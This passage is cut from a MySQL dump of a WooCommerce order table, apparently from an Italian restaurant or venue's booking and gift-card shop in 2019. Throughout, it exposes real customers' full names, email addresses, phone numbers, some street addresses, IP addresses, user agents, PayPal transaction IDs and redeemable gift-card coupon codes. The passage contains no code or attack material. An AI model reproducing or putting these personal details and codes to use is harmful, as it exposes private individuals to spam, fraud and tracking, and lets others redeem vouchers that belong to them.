12:04:42'),(15692,771,'_cart_hash','60d48b6d9b927fffe02528a2ae802c73'),(15693,771,'_billing_first_name','Sara'),(15694,771,'_billing_last_name','Fabbri'),(15695,771,'_billing_company',''),(15696,771,'_billing_address_1',''),(15697,771,'_billing_address_2',''),(15698,771,'_billing_city','Cesenatico'),(15699,771,'_billing_state',''),(15700,771,'_billing_postcode',''),(15701,771,'_billing_country',''),(15702,771,'_billing_email','sara-fabbri@hotmail.it'),(15703,771,'_billing_phone','3490964128'),(15704,771,'_shipping_first_name',''),(15705,771,'_shipping_last_name',''),(15706,771,'_shipping_company',''),(15707,771,'_shipping_address_1',''),(15708,771,'_shipping_address_2',''),(15709,771,'_shipping_city',''),(15710,771,'_shipping_state',''),(15711,771,'_shipping_postcode',''),(15712,771,'_shipping_country',''),(15713,771,'_order_currency','EUR'),(15714,771,'_cart_discount','0'),(15715,771,'_cart_discount_tax','0'),(15716,771,'_order_shipping','0.00'),(15717,771,'_order_shipping_tax','0'),(15718,771,'_order_tax','0'),(15719,771,'_order_total','30.00'),(15720,771,'_order_version','3.5.4'),(15721,771,'_prices_include_tax','no'),(15722,771,'_billing_address_index','Sara Fabbri    Cesenatico    sara-fabbri@hotmail.it 3490964128'),(15723,771,'_shipping_address_index','        '),(15724,771,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(15725,771,'Numero bambini fino a 6 anni','0'),(15726,771,'Numero ragazzi fino a 13 anni','0'),(15727,771,'Files attached','[]'),(15728,771,'Payment type','instant'),(15729,771,'_paypal_status','completed'),(15730,771,'_download_permissions_granted','yes'),(15731,771,'_recorded_sales','yes'),(15732,771,'_recorded_coupon_usage_counts','yes'),(15733,771,'_order_stock_reduced','yes'),(15734,771,'PayPal Transaction Fee','1.37'),(15735,772,'_order_key','wc_order_cnWhwPuStDtTP'),(15736,772,'_customer_user','0'),(15737,772,'_payment_method','paypal'),(15738,772,'_payment_method_title','PayPal'),(15739,772,'_transaction_id','5RD98978J8715620C'),(15740,772,'_customer_ip_address','80.104.255.79'),(15741,772,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.96 Safari/537.36'),(15742,772,'_created_via','checkout'),(15743,772,'_date_completed',''),(15744,772,'_completed_date',''),(15745,772,'_date_paid','1550151425'),(15746,772,'_paid_date','2019-02-14 14:37:05'),(15747,772,'_cart_hash','60d48b6d9b927fffe02528a2ae802c73'),(15748,772,'_billing_first_name','Marco'),(15749,772,'_billing_last_name','Bagiacchi'),(15750,772,'_billing_company',''),(15751,772,'_billing_address_1','Via nino bixio'),(15752,772,'_billing_address_2',''),(15753,772,'_billing_city','Misano'),(15754,772,'_billing_state',''),(15755,772,'_billing_postcode',''),(15756,772,'_billing_country',''),(15757,772,'_billing_email','m.bagiacchi@pascucci.it'),(15758,772,'_billing_phone','3493197451'),(15759,772,'_shipping_first_name',''),(15760,772,'_shipping_last_name',''),(15761,772,'_shipping_company',''),(15762,772,'_shipping_address_1',''),(15763,772,'_shipping_address_2',''),(15764,772,'_shipping_city',''),(15765,772,'_shipping_state',''),(15766,772,'_shipping_postcode',''),(15767,772,'_shipping_country',''),(15768,772,'_order_currency','EUR'),(15769,772,'_cart_discount','0'),(15770,772,'_cart_discount_tax','0'),(15771,772,'_order_shipping','0.00'),(15772,772,'_order_shipping_tax','0'),(15773,772,'_order_tax','0'),(15774,772,'_order_total','30.00'),(15775,772,'_order_version','3.5.4'),(15776,772,'_prices_include_tax','no'),(15777,772,'_billing_address_index','Marco Bagiacchi  Via nino bixio  Misano    m.bagiacchi@pascucci.it 3493197451'),(15778,772,'_shipping_address_index','        '),(15779,772,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(15780,772,'Numero bambini fino a 6 anni','0'),(15781,772,'Numero ragazzi fino a 13 anni','0'),(15782,772,'Files attached','[]'),(15783,772,'Payment type','instant'),(15784,772,'_paypal_status','completed'),(15785,772,'_download_permissions_granted','yes'),(15786,772,'_recorded_sales','yes'),(15787,772,'_recorded_coupon_usage_counts','yes'),(15788,772,'_order_stock_reduced','yes'),(15789,772,'PayPal Transaction Fee','1.37'),(15790,773,'_order_key','wc_order_7b6FVGjJEgyX7'),(15791,773,'_customer_user','0'),(15792,773,'_payment_method','paypal'),(15793,773,'_payment_method_title','PayPal'),(15794,773,'_transaction_id','11R18625BL5326624'),(15795,773,'_customer_ip_address','62.11.222.200'),(15796,773,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'),(15797,773,'_created_via','checkout'),(15798,773,'_date_completed',''),(15799,773,'_completed_date',''),(15800,773,'_date_paid','1550168351'),(15801,773,'_paid_date','2019-02-14 19:19:11'),(15802,773,'_cart_hash','60d48b6d9b927fffe02528a2ae802c73'),(15803,773,'_billing_first_name','Claudio'),(15804,773,'_billing_last_name','Ciardi'),(15805,773,'_billing_company',''),(15806,773,'_billing_address_1',''),(15807,773,'_billing_address_2',''),(15808,773,'_billing_city',''),(15809,773,'_billing_state',''),(15810,773,'_billing_postcode',''),(15811,773,'_billing_country',''),(15812,773,'_billing_email','claudio@ciardi.eu'),(15813,773,'_billing_phone','3351497878'),(15814,773,'_shipping_first_name',''),(15815,773,'_shipping_last_name',''),(15816,773,'_shipping_company',''),(15817,773,'_shipping_address_1',''),(15818,773,'_shipping_address_2',''),(15819,773,'_shipping_city',''),(15820,773,'_shipping_state',''),(15821,773,'_shipping_postcode',''),(15822,773,'_shipping_country',''),(15823,773,'_order_currency','EUR'),(15824,773,'_cart_discount','0'),(15825,773,'_cart_discount_tax','0'),(15826,773,'_order_shipping','0.00'),(15827,773,'_order_shipping_tax','0'),(15828,773,'_order_tax','0'),(15829,773,'_order_total','30.00'),(15830,773,'_order_version','3.5.4'),(15831,773,'_prices_include_tax','no'),(15832,773,'_billing_address_index','Claudio Ciardi        claudio@ciardi.eu 3351497878'),(15833,773,'_shipping_address_index','        '),(15834,773,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(15835,773,'Numero bambini fino a 6 anni','0'),(15836,773,'Numero ragazzi fino a 13 anni','0'),(15837,773,'Files attached','[]'),(15838,773,'Payment type','instant'),(15839,773,'_paypal_status','completed'),(15840,773,'_download_permissions_granted','yes'),(15841,773,'_recorded_sales','yes'),(15842,773,'_recorded_coupon_usage_counts','yes'),(15843,773,'_order_stock_reduced','yes'),(15844,773,'PayPal Transaction Fee','1.37'),(15845,775,'_order_key','wc_order_sfNrlsftGReBH'),(15846,775,'_customer_user','0'),(15847,775,'_payment_method','paypal'),(15848,775,'_payment_method_title','PayPal'),(15849,775,'_transaction_id','3GR81834ME107094H'),(15850,775,'_customer_ip_address','77.32.34.53'),(15851,775,'_customer_user_agent','Mozilla/5.0 (Linux; Android 8.0.0; ANE-LX1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Mobile Safari/537.36'),(15852,775,'_created_via','checkout'),(15853,775,'_date_completed',''),(15854,775,'_completed_date',''),(15855,775,'_date_paid','1551877684'),(15856,775,'_paid_date','2019-03-06 14:08:04'),(15857,775,'_cart_hash','bf64252688013774e3a0ee26cf52711b'),(15858,775,'_billing_first_name','Giorgia'),(15859,775,'_billing_last_name','Martinelli'),(15860,775,'_billing_company',''),(15861,775,'_billing_address_1',''),(15862,775,'_billing_address_2',''),(15863,775,'_billing_city',''),(15864,775,'_billing_state',''),(15865,775,'_billing_postcode',''),(15866,775,'_billing_country',''),(15867,775,'_billing_email','apegiorgia@gmail.com'),(15868,775,'_billing_phone','3341470048'),(15869,775,'_shipping_first_name',''),(15870,775,'_shipping_last_name',''),(15871,775,'_shipping_company',''),(15872,775,'_shipping_address_1',''),(15873,775,'_shipping_address_2',''),(15874,775,'_shipping_city',''),(15875,775,'_shipping_state',''),(15876,775,'_shipping_postcode',''),(15877,775,'_shipping_country',''),(15878,775,'_order_currency','EUR'),(15879,775,'_cart_discount','0'),(15880,775,'_cart_discount_tax','0'),(15881,775,'_order_shipping','0.00'),(15882,775,'_order_shipping_tax','0'),(15883,775,'_order_tax','0'),(15884,775,'_order_total','120.00'),(15885,775,'_order_version','3.5.5'),(15886,775,'_prices_include_tax','no'),(15887,775,'_billing_address_index','Giorgia Martinelli        apegiorgia@gmail.com 3341470048'),(15888,775,'_shipping_address_index','        '),(15889,775,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(15890,775,'Numero bambini fino a 6 anni','0'),(15891,775,'Numero ragazzi fino a 13 anni','0'),(15892,775,'Files attached','[]'),(15893,775,'Payment type','instant'),(15894,775,'_paypal_status','completed'),(15895,775,'_download_permissions_granted','yes'),(15896,775,'_recorded_sales','yes'),(15897,775,'_recorded_coupon_usage_counts','yes'),(15898,775,'_order_stock_reduced','yes'),(15899,776,'discount_type','fixed_cart'),(15900,776,'coupon_amount','120'),(15901,776,'individual_use','no'),(15902,776,'usage_limit','1'),(15903,776,'expiry_date','2019-09-02'),(15904,776,'apply_before_tax','no'),(15905,776,'free_shipping','yes'),(15906,776,'minimum_amount',''),(15907,776,'maximum_amount',''),(15908,776,'exclude_sale_items','no'),(15909,776,'exclude_product_categories',''),(15910,776,'exclude_product_ids',''),(15911,776,'mwb_wgm_giftcard_coupon','775'),(15912,776,'mwb_wgm_giftcard_coupon_unique','online'),(15913,776,'mwb_wgm_giftcard_coupon_product_id','472'),(15914,776,'mwb_wgm_giftcard_coupon_mail_to','chbarile@live.com'),(15915,775,'775#274','solymarcoupon8KVBZ'),(15916,775,'mwb_wgm_order_giftcard','send'),(15917,775,'PayPal Transaction Fee','4.43'),(15918,777,'_order_key','wc_order_5h9BzULgOSeiQ'),(15919,777,'_customer_user','47'),(15920,777,'_payment_method','paypal'),(15921,777,'_payment_method_title','PayPal'),(15922,777,'_transaction_id','2HL30763MJ079094Y'),(15923,777,'_customer_ip_address','89.190.176.75'),(15924,777,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'),(15925,777,'_created_via','checkout'),(15926,777,'_date_completed','1552404825'),(15927,777,'_completed_date','2019-03-12 16:33:45'),(15928,777,'_date_paid','1552403412'),(15929,777,'_paid_date','2019-03-12 16:10:12'),(15930,777,'_cart_hash','805b9fc50afbefd87abfd852afc715c7'),(15931,777,'_billing_first_name','Christina'),(15932,777,'_billing_last_name','Amplatz'),(15933,777,'_billing_company',''),(15934,777,'_billing_address_1','Kirchplatz'),(15935,777,'_billing_address_2',''),(15936,777,'_billing_city','Montan'),(15937,777,'_billing_state',''),(15938,777,'_billing_postcode',''),(15939,777,'_billing_country',''),(15940,777,'_billing_email','christinaamplatz@gmail.com'),(15941,777,'_billing_phone','3497855617'),(15942,777,'_shipping_first_name',''),(15943,777,'_shipping_last_name',''),(15944,777,'_shipping_company',''),(15945,777,'_shipping_address_1',''),(15946,777,'_shipping_address_2',''),(15947,777,'_shipping_city',''),(15948,777,'_shipping_state',''),(15949,777,'_shipping_postcode',''),(15950,777,'_shipping_country',''),(15951,777,'_order_currency','EUR'),(15952,777,'_cart_discount','0'),(15953,777,'_cart_discount_tax','0'),(15954,777,'_order_shipping','0.00'),(15955,777,'_order_shipping_tax','0'),(15956,777,'_order_tax','0'),(15957,777,'_order_total','100.00'),(15958,777,'_order_version','3.5.7'),(15959,777,'_prices_include_tax','no'),(15960,777,'_billing_address_index','Christina Amplatz  Kirchplatz  Montan    christinaamplatz@gmail.com 3497855617'),(15961,777,'_shipping_address_index','        '),(15962,777,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(15963,777,'Numero bambini fino a 6 anni','0'),(15964,777,'Numero ragazzi fino a 13 anni','0'),(15965,777,'Files attached','[]'),(15966,777,'Payment type','instant'),(15967,777,'_paypal_status','completed'),(15968,777,'_download_permissions_granted','yes'),(15969,777,'_recorded_sales','yes'),(15970,777,'_recorded_coupon_usage_counts','yes'),(15971,777,'_order_stock_reduced','yes'),(15972,778,'discount_type','fixed_cart'),(15973,778,'coupon_amount','100'),(15974,778,'individual_use','no'),(15975,778,'usage_limit','1'),(15976,778,'expiry_date','2019-09-08'),(15977,778,'apply_before_tax','no'),(15978,778,'free_shipping','yes'),(15979,778,'minimum_amount',''),(15980,778,'maximum_amount',''),(15981,778,'exclude_sale_items','no'),(15982,778,'exclude_product_categories',''),(15983,778,'exclude_product_ids',''),(15984,778,'mwb_wgm_giftcard_coupon','777'),(15985,778,'mwb_wgm_giftcard_coupon_unique','online'),(15986,778,'mwb_wgm_giftcard_coupon_product_id','548'),(15987,778,'mwb_wgm_giftcard_coupon_mail_to','christinaamplatz@gmail.com'),(15988,777,'777#275','solymarcouponTOSZB'),(15989,777,'mwb_wgm_order_giftcard','send'),(15990,777,'PayPal Transaction Fee','3.75'),(15991,435,'_low_stock_amount',''),(15992,472,'_low_stock_amount',''),(15993,780,'_order_key','wc_order_mnEq2yxAPyzw1'),(15994,780,'_customer_user','48'),(15995,780,'_payment_method','paypal'),(15996,780,'_payment_method_title','PayPal'),(15997,780,'_transaction_id',''),(15998,780,'_customer_ip_address','195.81.11.130'),(15999,780,'_customer_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'),(16000,780,'_created_via','checkout'),(16001,780,'_date_completed',''),(16002,780,'_completed_date',''),(16003,780,'_date_paid',''),(16004,780,'_paid_date',''),(16005,780,'_cart_hash','552c77636600d038700eaa2655e400bf'),(16006,780,'_billing_first_name','Valentina'),(16007,780,'_billing_last_name','ciuffoli'),(16008,780,'_billing_company',''),(16009,780,'_billing_address_1',''),(16010,780,'_billing_address_2',''),(16011,780,'_billing_city',''),(16012,780,'_billing_state',''),(16013,780,'_billing_postcode',''),(16014,780,'_billing_country',''),(16015,780,'_billing_email','valezones@yahoo.it'),(16016,780,'_billing_phone','3346149862'),(16017,780,'_shipping_first_name',''),(16018,780,'_shipping_last_name',''),(16019,780,'_shipping_company',''),(16020,780,'_shipping_address_1',''),(16021,780,'_shipping_address_2',''),(16022,780,'_shipping_city',''),(16023,780,'_shipping_state',''),(16024,780,'_shipping_postcode',''),(16025,780,'_shipping_country',''),(16026,780,'_order_currency','EUR'),(16027,780,'_cart_discount','0'),(16028,780,'_cart_discount_tax','0'),(16029,780,'_order_shipping','0.00'),(16030,780,'_order_shipping_tax','0'),(16031,780,'_order_tax','0'),(16032,780,'_order_total','130.00'),(16033,780,'_order_version','3.5.7'),(16034,780,'_prices_include_tax','no'),(16035,780,'_billing_address_index','Valentina ciuffoli        valezones@yahoo.it 3346149862'),(16036,780,'_shipping_address_index','        '),(16037,780,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(16038,780,'Numero bambini fino a 6 anni','0'),(16039,780,'Numero ragazzi fino a 13 anni','0'),(16040,780,'Files attached','[]'),(16041,781,'_order_key','wc_order_QdUmVnUgPTmub'),(16042,781,'_customer_user','48'),(16043,781,'_payment_method','paypal'),(16044,781,'_payment_method_title','PayPal'),(16045,781,'_transaction_id','48U28559B81328712'),(16046,781,'_customer_ip_address','195.81.11.130'),(16047,781,'_customer_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'),(16048,781,'_created_via','checkout'),(16049,781,'_date_completed',''),(16050,781,'_completed_date',''),(16051,781,'_date_paid','1553534337'),(16052,781,'_paid_date','2019-03-25 18:18:57'),(16053,781,'_cart_hash','eb76f563ffa055ba26044b65b2182fbe'),(16054,781,'_billing_first_name','Valentina'),(16055,781,'_billing_last_name','ciuffoli'),(16056,781,'_billing_company',''),(16057,781,'_billing_address_1',''),(16058,781,'_billing_address_2',''),(16059,781,'_billing_city',''),(16060,781,'_billing_state',''),(16061,781,'_billing_postcode',''),(16062,781,'_billing_country',''),(16063,781,'_billing_email','valezones@yahoo.it'),(16064,781,'_billing_phone','3346149862'),(16065,781,'_shipping_first_name',''),(16066,781,'_shipping_last_name',''),(16067,781,'_shipping_company',''),(16068,781,'_shipping_address_1',''),(16069,781,'_shipping_address_2',''),(16070,781,'_shipping_city',''),(16071,781,'_shipping_state',''),(16072,781,'_shipping_postcode',''),(16073,781,'_shipping_country',''),(16074,781,'_order_currency','EUR'),(16075,781,'_cart_discount','0'),(16076,781,'_cart_discount_tax','0'),(16077,781,'_order_shipping','0.00'),(16078,781,'_order_shipping_tax','0'),(16079,781,'_order_tax','0'),(16080,781,'_order_total','70.00'),(16081,781,'_order_version','3.5.7'),(16082,781,'_prices_include_tax','no'),(16083,781,'_billing_address_index','Valentina ciuffoli        valezones@yahoo.it 3346149862'),(16084,781,'_shipping_address_index','        '),(16085,781,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(16086,781,'Numero bambini fino a 6 anni','0'),(16087,781,'Numero ragazzi fino a 13 anni','0'),(16088,781,'Files attached','[]'),(16089,781,'Payment type','instant'),(16090,781,'_paypal_status','completed'),(16091,781,'_download_permissions_granted','yes'),(16092,781,'_recorded_sales','yes'),(16093,781,'_recorded_coupon_usage_counts','yes'),(16094,781,'_order_stock_reduced','yes'),(16095,782,'discount_type','fixed_cart'),(16096,782,'coupon_amount','70'),(16097,782,'individual_use','no'),(16098,782,'usage_limit','1'),(16099,782,'expiry_date','2019-09-21'),(16100,782,'apply_before_tax','no'),(16101,782,'free_shipping','yes'),(16102,782,'minimum_amount',''),(16103,782,'maximum_amount',''),(16104,782,'exclude_sale_items','no'),(16105,782,'exclude_product_categories',''),(16106,782,'exclude_product_ids',''),(16107,782,'mwb_wgm_giftcard_coupon','781'),(16108,782,'mwb_wgm_giftcard_coupon_unique','online'),(16109,782,'mwb_wgm_giftcard_coupon_product_id','548'),(16110,782,'mwb_wgm_giftcard_coupon_mail_to','Silvia Saragoni'),(16111,781,'781#278','solymarcouponBD8ML'),(16112,781,'mwb_wgm_order_giftcard','send'),(16113,781,'PayPal Transaction Fee','2.73'),(16114,784,'_edit_lock','1555008571:1'),(16115,784,'_edit_last','1'),(16118,786,'_wp_attached_file','2019/04/happy-easter.jpg'),(16119,786,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:24:\"2019/04/happy-easter.jpg\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:24:\"happy-easter-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:24:\"happy-easter-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:24:\"happy-easter-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"happy-easter-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"happy-easter-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"happy-easter-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:24:\"happy-easter-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:24:\"happy-easter-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:24:\"happy-easter-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:24:\"happy-easter-480x480.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:24:\"happy-easter-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:24:\"happy-easter-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"happy-easter-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(16120,784,'_thumbnail_id','786'),(16121,784,'_wp_page_template','default'),(16124,784,'_yoast_wpseo_content_score','60'),(16125,784,'_yoast_wpseo_primary_category','1'),(16126,631,'_low_stock_amount',''),(16129,333,'_low_stock_amount',''),(16130,630,'_low_stock_amount',''),(16131,325,'_low_stock_amount',''),(16132,324,'_low_stock_amount',''),(16133,323,'_low_stock_amount',''),(16134,322,'_low_stock_amount',''),(16135,633,'_low_stock_amount',''),(16136,337,'_low_stock_amount',''),(16137,334,'_low_stock_amount',''),(16138,331,'_low_stock_amount',''),(16139,329,'_low_stock_amount',''),(16140,328,'_low_stock_amount',''),(16141,327,'_low_stock_amount',''),(16142,790,'_order_key','wc_order_5Y8qrnxsQHC6v'),(16143,790,'_customer_user','0'),(16144,790,'_payment_method','paypal'),(16145,790,'_payment_method_title','PayPal'),(16146,790,'_transaction_id',''),(16147,790,'_customer_ip_address','93.43.181.234'),(16148,790,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 12_1_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/16D57 [FBAN/FBIOS;FBAV/213.0.0.50.100;FBBV/146692790;FBDV/iPhone10,4;FBMD/iPhone;FBSN/iOS;FBSV/12.1.4;FBSS/2;FBCR/3 ITA;FBID/phone;FBLC/it_IT;FBOP/5;FBRV/147785696]'),(16149,790,'_created_via','checkout'),(16150,790,'_date_completed',''),(16151,790,'_completed_date',''),(16152,790,'_date_paid',''),(16153,790,'_paid_date',''),(16154,790,'_cart_hash','756f73f11b0cec532b23c141ee80f71f'),(16155,790,'_billing_first_name','Valentina'),(16156,790,'_billing_last_name','Ladisa'),(16157,790,'_billing_company',''),(16158,790,'_billing_address_1',''),(16159,790,'_billing_address_2',''),(16160,790,'_billing_city','Bari'),(16161,790,'_billing_state',''),(16162,790,'_billing_postcode',''),(16163,790,'_billing_country',''),(16164,790,'_billing_email','Valentina.ladisa@aiesec.net'),(16165,790,'_billing_phone','3392441989'),(16166,790,'_shipping_first_name',''),(16167,790,'_shipping_last_name',''),(16168,790,'_shipping_company',''),(16169,790,'_shipping_address_1',''),(16170,790,'_shipping_address_2',''),(16171,790,'_shipping_city',''),(16172,790,'_shipping_state',''),(16173,790,'_shipping_postcode',''),(16174,790,'_shipping_country',''),(16175,790,'_order_currency','EUR'),(16176,790,'_cart_discount','0'),(16177,790,'_cart_discount_tax','0'),(16178,790,'_order_shipping','0.00'),(16179,790,'_order_shipping_tax','0'),(16180,790,'_order_tax','0'),(16181,790,'_order_total','60.00'),(16182,790,'_order_version','3.5.7'),(16183,790,'_prices_include_tax','no'),(16184,790,'_billing_address_index','Valentina Ladisa    Bari    Valentina.ladisa@aiesec.net 3392441989'),(16185,790,'_shipping_address_index','        '),(16186,790,'Quanti adulti?','2'),(16187,790,'Numero bambini fino a 6 anni','0'),(16188,790,'Numero ragazzi fino a 14 anni','0'),(16189,790,'Numero ragazzi dai 15 anni in su','0'),(16190,790,'Files attached','[]'),(16191,791,'_order_key','wc_order_iuItCTMrJfFhA'),(16192,791,'_customer_user','0'),(16193,791,'_payment_method','paypal'),(16194,791,'_payment_method_title','PayPal'),(16195,791,'_transaction_id','6GW61875RL7280324'),(16196,791,'_customer_ip_address','151.46.22.196'),(16197,791,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 12_1_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1'),(16198,791,'_created_via','checkout'),(16199,791,'_date_completed',''),(16200,791,'_completed_date',''),(16201,791,'_date_paid','1554384669'),(16202,791,'_paid_date','2019-04-04 15:31:09'),(16203,791,'_cart_hash','756f73f11b0cec532b23c141ee80f71f'),(16204,791,'_billing_first_name','Andrea'),(16205,791,'_billing_last_name','Milito'),(16206,791,'_billing_company',''),(16207,791,'_billing_address_1',''),(16208,791,'_billing_address_2',''),(16209,791,'_billing_city',''),(16210,791,'_billing_state',''),(16211,791,'_billing_postcode',''),(16212,791,'_billing_country',''),(16213,791,'_billing_email','valentina.ladisa@aiesec.net'),(16214,791,'_billing_phone','3392441989'),(16215,791,'_shipping_first_name',''),(16216,791,'_shipping_last_name',''),(16217,791,'_shipping_company',''),(16218,791,'_shipping_address_1',''),(16219,791,'_shipping_address_2',''),(16220,791,'_shipping_city',''),(16221,791,'_shipping_state',''),(16222,791,'_shipping_postcode',''),(16223,791,'_shipping_country',''),(16224,791,'_order_currency','EUR'),(16225,791,'_cart_discount','0'),(16226,791,'_cart_discount_tax','0'),(16227,791,'_order_shipping','0.00'),(16228,791,'_order_shipping_tax','0'),(16229,791,'_order_tax','0'),(16230,791,'_order_total','60.00'),(16231,791,'_order_version','3.5.7'),(16232,791,'_prices_include_tax','no'),(16233,791,'_billing_address_index','Andrea Milito        valentina.ladisa@aiesec.net 3392441989'),(16234,791,'_shipping_address_index','        '),(16235,791,'Quanti adulti?','2'),(16236,791,'Numero bambini fino a 6 anni','0'),(16237,791,'Numero ragazzi fino a 14 anni','0'),(16238,791,'Numero ragazzi dai 15 anni in su','0'),(16239,791,'Files attached','[]'),(16240,791,'Payment type','instant'),(16241,791,'_paypal_status','completed'),(16242,791,'_download_permissions_granted','yes'),(16243,791,'_recorded_sales','yes'),(16244,791,'_recorded_coupon_usage_counts','yes'),(16245,791,'_order_stock_reduced','yes'),(16246,791,'PayPal Transaction Fee','2.39'),(16247,792,'_order_key','wc_order_UPB7YL7jDD1lg'),(16248,792,'_customer_user','49'),(16249,792,'_payment_method','paypal'),(16250,792,'_payment_method_title','PayPal'),(16251,792,'_transaction_id','9BT46670LS733213W'),(16252,792,'_customer_ip_address','2.45.27.20'),(16253,792,'_customer_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0'),(16254,792,'_created_via','checkout'),(16255,792,'_date_completed',''),(16256,792,'_completed_date',''),(16257,792,'_date_paid','1554406352'),(16258,792,'_paid_date','2019-04-04 21:32:32'),(16259,792,'_cart_hash','f96aabf744a2752a8d7a7507ae54dfa8'),(16260,792,'_billing_first_name','Fabio'),(16261,792,'_billing_last_name','Santini'),(16262,792,'_billing_company',''),(16263,792,'_billing_address_1','Via Senofonte 2/A'),(16264,792,'_billing_address_2',''),(16265,792,'_billing_city','Milano'),(16266,792,'_billing_state',''),(16267,792,'_billing_postcode',''),(16268,792,'_billing_country',''),(16269,792,'_billing_email','fabio.santini@remediasrl.com'),(16270,792,'_billing_phone','+39335427626'),(16271,792,'_shipping_first_name',''),(16272,792,'_shipping_last_name',''),(16273,792,'_shipping_company',''),(16274,792,'_shipping_address_1',''),(16275,792,'_shipping_address_2',''),(16276,792,'_shipping_city',''),(16277,792,'_shipping_state',''),(16278,792,'_shipping_postcode',''),(16279,792,'_shipping_country',''),(16280,792,'_order_currency','EUR'),(16281,792,'_cart_discount','0'),(16282,792,'_cart_discount_tax','0'),(16283,792,'_order_shipping','0.00'),(16284,792,'_order_shipping_tax','0'),(16285,792,'_order_tax','0'),(16286,792,'_order_total','240.00'),(16287,792,'_order_version','3.5.7'),(16288,792,'_prices_include_tax','no'),(16289,792,'_billing_address_index','Fabio Santini  Via Senofonte 2/A  Milano    fabio.santini@remediasrl.com +39335427626'),(16290,792,'_shipping_address_index','        '),(16291,792,'Quanti adulti?','6'),(16292,792,'Numero bambini fino a 6 anni','0'),(16293,792,'Numero ragazzi fino a 14 anni','2'),(16294,792,'Numero ragazzi dai 15 anni in su','0'),(16295,792,'Files attached','[]'),(16296,792,'Payment type','instant'),(16297,792,'_paypal_status','completed'),(16298,792,'_download_permissions_granted','yes'),(16299,792,'_recorded_sales','yes'),(16300,792,'_recorded_coupon_usage_counts','yes'),(16301,792,'_order_stock_reduced','yes'),(16302,792,'PayPal Transaction 